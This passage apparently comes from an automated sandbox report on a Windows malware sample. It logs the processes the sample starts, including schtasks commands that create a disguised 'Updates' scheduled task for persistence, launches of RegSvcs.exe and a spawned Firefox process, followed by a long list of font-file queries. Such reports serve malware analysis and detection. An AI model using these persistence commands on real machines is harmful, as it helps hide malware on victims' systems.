            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpA933.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\snTlRrBza" /XML "C:\Users\user\AppData\Local\Temp\tmpCEDB.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeProcess created: C:\Windows\SysWOW64\SearchIndexer.exe "C:\Windows\SysWOW64\SearchIndexer.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeProcess created: C:\Windows\SysWOW64\SearchIndexer.exe "C:\Windows\SysWOW64\SearchIndexer.exe"Jump to behavior
            Source: qRurKwDVhn.exe, 00000010.00000002.2924919774.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000010.00000000.2018186011.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000000.2253641053.0000000001060000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: qRurKwDVhn.exe, 00000010.00000002.2924919774.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000010.00000000.2018186011.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000000.2253641053.0000000001060000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: qRurKwDVhn.exe, 00000010.00000002.2924919774.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000010.00000000.2018186011.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000000.2253641053.0000000001060000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: qRurKwDVhn.exe, 00000010.00000002.2924919774.0000000000F20000.00000002.00000001.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000010.00000000.2018186011.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000000.2253641053.0000000001060000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
